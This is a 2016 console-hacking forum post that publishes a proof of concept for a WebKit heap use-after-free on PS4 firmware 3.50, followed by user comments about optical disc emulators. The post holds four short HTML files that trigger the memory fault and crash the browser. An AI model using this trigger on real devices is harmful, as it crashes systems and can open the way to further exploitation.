Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       29,384       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg

Comments

Chaos Kid

Developer
Contributor
This sounds kinda interesting like the game is causing the crash n only one exploite comes to mind with this one.unless your system is having issues but sounds like between game and system

Yea you will see a cfw when ode releases there new product. 2016 new release code is interesting

Chaos Kid

Developer
Contributor
sorry if its a stupid question,
but who or what is ode?
You mean who is cobra ode?
Cobra ode is a bunch of different developers from the scene who have bin hidden n watching n using other ppls work for there development that sell there hw device that's a bare on metal

mcmrc1

Contributor
Verified
sorry if its a stupid question,
but who or what is ode?
ODE = optical disc emulator

That means it is a piece of hardware that got installed on your console. This hardware emulates the blueray disc so the console think if you mount an iso inage that it is a valid one

Chaos Kid

Developer
Contributor
ODE = optical disc emulator

That means it is a piece of hardware that got installed on your console. This hardware emulates the blueray disc so the console think if you mount an iso inage that it is a valid one
Are you sure that's what ODE stands for?
That's the term every1 knows it as

Recent Articles
Outer Wilds Transcends to New PlayStation 4 Games Next Week
Headlining the latest PlayStation 4 games next week is the open world mystery video game Outer Wilds, where you can explore a vast universe, throw a Jackbox party or investigate the mysterious...
Gears of Kombat Free Game for PC, PS3 and Xbox 360 by Batman
Proceeding my UDK Ultimate PS3 Update V2 (Official UDKUltimate Site) and video guide tutorials, today I present via Twitter a Gears of Kombat Free Game for PC, PS3 and Xbox 360 for everyone in the...
Mednafen PS4 PKG Port of Multi-system Emulator Arrives via Markus95
Following the Mednafen PS4 Emulator Demos earlier in the month, this weekend tester @Markus95 (aka @Kus00095) made available via Twitter a Mednafen PS4 PKG Port (mednafen.pkg) by Znullptr (aka...
Sony Holographic Display Patent and Voxon Photonics 3D Demos
This past Tuesday Sony officially unveiled the PS5 console, and recently a Sony Holographic Display Screen patent from September 2019 surfaced leading to speculation on whether the new 3D...